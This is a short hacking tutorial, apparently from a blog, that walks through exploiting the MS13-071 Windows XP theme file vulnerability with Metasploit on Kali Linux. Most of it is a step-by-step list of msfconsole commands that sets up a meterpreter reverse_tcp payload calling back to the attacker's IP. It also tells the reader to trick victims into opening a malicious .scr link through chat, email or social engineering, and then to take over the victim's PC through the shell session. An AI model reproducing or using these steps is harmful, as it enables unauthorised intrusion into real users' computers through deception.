Hack Windows XP PC (Theme Arbitrary Code Execution) with Kali linux

Happy Republic Day to all Indians Proud of being Indian jai Hind!!!

So today we will look how an attacker can hack into windows xp system using a Arbitrary code execution vulnerability.We are going to use metasploit that is present on kali Linux or you can do the same with backtrack also. Technical description of the vulnerability is there exist a vulnerability on Microsoft Windows XP and Windows 2003 Operating system on handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the “Screen Saver” tab is viewed.

Lets carryout the attack Practically here i have used victim machine to windows sp3 and attack to be kali Linux.
so follow it step by step

open terminal in kali Linux and type msfconsole.

Now type down following commands one by one

use exploit/windows/fileformat/ms13_071_theme

msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms13_071_theme)>set lhost 192.168.223.133
(IP of your Kali machine to know type ifconfig on new terminal)

msf exploit (ms13_071_theme)>set srvhost 192.168.223.133

msf exploit (ms13_071_theme)>exploit

once all this done you need to give to your victim \\192.168.1.3:gCzJXDKtJugDsVFC.scr via chat or email or any social engineering technique you can use.once the victim open the url provided by you he will asked for confirmation of opening link .
as soon as victim click run you will have your meterpreter shell open .

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Enjoy Hacking Be safe and keep learning .